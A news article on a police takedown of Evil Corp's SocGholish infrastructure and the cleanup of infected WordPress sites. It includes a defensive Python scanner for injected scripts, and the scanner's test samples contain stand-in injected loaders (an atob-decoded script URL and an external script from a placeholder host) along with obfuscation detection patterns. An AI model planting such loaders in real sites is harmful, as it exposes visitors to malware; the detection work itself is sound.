Police Seize Evil Corp-Tied Group’s Servers, Clean Subverted WordPress Sites

In a coordinated law enforcement operation, police seized more than a hundred servers tied to a hacking group that sells access to compromised computers. The operation also cleaned up tens of thousands of websites that had unwittingly served the group's malicious code, including a social engineering lure known as ClickFix that tricks visitors into infecting themselves. The disruption is a direct blow to an infection chain shaped by the Russian-speaking syndicate Evil Corp.
Dutch police announced the operation last Thursday, saying they had disrupted a key infection chain associated with Evil Corp. Officials said the action both cut the criminals' access to compromised systems and protected thousands of victims from further abuse.
Maikel Rollman, a representative of the Dutch National High Tech Crime Unit which orchestrated the operation, emphasized the significance of these activities. “With these actions, we deprive cybercriminals of access to infected computer systems,” he stated. The crackdown was a collaborative effort, working alongside agencies such as the FBI, Royal Canadian Mounted Police, and Germany’s Federal Criminal Police Office, with additional support from Europol, Eurojust, and various private sector partners.
Rollman also hinted at further actions against SocGholish, the malware family at the center of the operation. Also known as "FakeUpdates," the malware poses as a legitimate browser or software update to trick users into installing it.
Evil Corp, whose SocGholish operation is tracked by security vendors under the names Mustard Tempest, UNC1543 and TA569, has been a central player in cybercrime-as-a-service since 2017. According to security firm Orange Cyberdefense, British law enforcement has linked Evil Corp to the Russian government, which is said to use the group for cyberattacks and espionage.
As part of the operation, owners of WordPress sites compromised by SocGholish were notified directly. HaveIBeenPwned, Spamhaus and the Dutch National Cyber Security Centre were among the organizations that took part. The notifications confirmed that the malware had been removed from the site and urged owners to harden it: change passwords, enable multifactor authentication, and delete any accounts they did not create.
HaveIBeenPwned said it received a list of 154,000 email addresses targeted in SocGholish attacks, along with more than half a million passwords obtained by the group that had not previously appeared in its corpus.
According to the Dutch police, SocGholish was active on nearly 15,000 websites, and the criminals had obtained login credentials for approximately 1.4 million sites. The takedown is the latest action under Operation Endgame, an international law enforcement initiative launched in 2024 to dismantle cybercrime infrastructure and prosecute its operators. Earlier phases took down botnets and illicit hosting services and led to multiple arrests.
Experts stress that SocGholish usually marks the first stage of an intrusion rather than the last. Researchers describe it as a JavaScript-based downloader run by a financially motivated group that acts as an initial access broker, selling the footholds it gains to other criminals, including ransomware gangs and nation-state actors.
Evil Corp's continued focus on widely used content management systems such as WordPress, which powers roughly 43% of websites, reflects its relentless pursuit of exploitable targets. The operators break in by exploiting known vulnerabilities or by using stolen credentials, then inject malicious JavaScript that only triggers under certain conditions, such as a particular browser or referrer. Visitors who meet those conditions are shown a fake browser update prompt and urged to click a misleading download link.
If they do, the resulting malware connects to command-and-control servers run by the group. Follow-on payloads have included infostealers, ransomware such as LockBit and WastedLocker, and remote access Trojans including AsyncRAT and NetSupport RAT.
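The cleanup described above starts with finding the injected script on a compromised site. The following triage scanner is an added example written for this article; it is not police, vendor or Evil Corp code, and it carries no real indicators. It walks a site's theme and plugin files, pulls out every `<script>` tag, and flags two patterns typical of injected loaders: an external script source whose host is not on an allowlist, and an inline script using obfuscation helpers (eval, atob, String.fromCharCode) or a long base64 blob. The allowlist hosts, the sample files and the domains in them are all constructed placeholders.

```python
"""Triage scanner for SocGholish-style script injection in WordPress files.

Added example (not from the article or any vendor). Sample files, hosts
and the allowlist below are constructed placeholders, not real indicators.
"""
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Match a bare src= attribute (not data-src=) inside the tag's attribute list.
SRC_RE = re.compile(r"""(?<![\w-])src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# A run of 80+ base64 characters inside an inline script is unusual in
# hand-written theme code and common in injected loaders.
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")
OBFUSCATION_MARKERS = ("eval(", "atob(", "String.fromCharCode", "unescape(", "document.write(")

# Assumed allowlist of hosts the site legitimately loads scripts from.
ALLOWED_HOSTS = {"example-site.test", "cdn.example-cdn.test"}


def scan_html(text, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of (kind, detail) findings for one file's contents."""
    findings = []
    for m in SCRIPT_RE.finditer(text):
        attrs, body = m.group(1), m.group(2)
        src = SRC_RE.search(attrs)
        if src:
            url = src.group(1)
            if url.startswith("//"):          # protocol-relative URL
                url = "https:" + url
            host = urlparse(url).hostname     # None for relative paths
            if host and host not in allowed_hosts:
                findings.append(("external_script", host))
            continue
        markers = [k for k in OBFUSCATION_MARKERS if k in body]
        if markers or B64_RUN_RE.search(body):
            findings.append(("suspicious_inline", ",".join(markers) or "base64_blob"))
    return findings


def scan_tree(root, exts=(".php", ".html", ".js")):
    """Scan every theme/plugin file under root; return {relative_path: findings}."""
    root = Path(root)
    results = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in exts:
            found = scan_html(p.read_text(errors="replace"))
            if found:
                results[p.relative_to(root).as_posix()] = found
    return results


# Constructed sample files standing in for a WordPress install.
CLEAN = (
    '<html><head>'
    '<script src="/wp-includes/js/jquery/jquery.min.js"></script>'
    '<script src="https://cdn.example-cdn.test/lib.js"></script>'
    '<script>var x = 1;</script>'
    '</head></html>'
)
INJECTED_INLINE = (
    '<?php get_header(); ?>\n'
    '<script>var d=document,s=d.createElement("script");'
    's.src=atob("Ly9wbGFjZWhvbGRlci5pbnZhbGlkL2xvYWRlci5qcw==");'  # "//placeholder.invalid/loader.js"
    'd.head.appendChild(s);</script>'
)
INJECTED_EXTERNAL = (
    '<script type="text/javascript" src="//update-check.invalid/loader.js"></script>'
)
SAMPLES = {
    "wp-content/themes/site/header.php": CLEAN,
    "wp-content/themes/site/footer.php": INJECTED_INLINE,
    "wp-content/plugins/widget/widget.php": INJECTED_EXTERNAL,
}


def demo():
    """Write the constructed samples to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLES.items():
            p = Path(root, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(content)
        return scan_tree(root)


if __name__ == "__main__":
    for path, findings in demo().items():
        for kind, detail in findings:
            print(f"{path}: {kind} ({detail})")
```

Run it against a real site by calling `scan_tree("/var/www/html")` with an allowlist built from the site's known CDNs. Expect false positives from minified vendor bundles that legitimately use `eval` or embed base64 assets; treat hits as triage leads to compare against a clean copy of the theme, not as verdicts. The scanner will not see injections stored in the database (post content, widget options) or in files outside the extensions listed, so pair it with a database search for `<script` and a file-integrity comparison against the upstream release.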
SocGholish's reach is broad, affecting law firms, schools, healthcare providers and hospitals among others. Renée Burton, vice president of threat intelligence at Infoblox, pointed to the pervasiveness of the group's activity. "SocGholish is not a niche threat. Their operations penetrate deeply into both public sector and commercial environments, facilitating access for other cybercriminals," she said.
Infoblox found that more than half of its cloud customers, including critical infrastructure organizations, had contact with SocGholish-controlled websites over the past year. Law enforcement continues to grapple with Evil Corp, which remains tied to a range of illicit activity from malware distribution to large-scale ransomware and money laundering. Because many of its members operate from jurisdictions beyond the reach of Western law enforcement, authorities are unlikely to eliminate the threat outright, and experts expect the group to regroup and rebuild its infrastructure, as cybercrime organizations have repeatedly done after past takedowns.

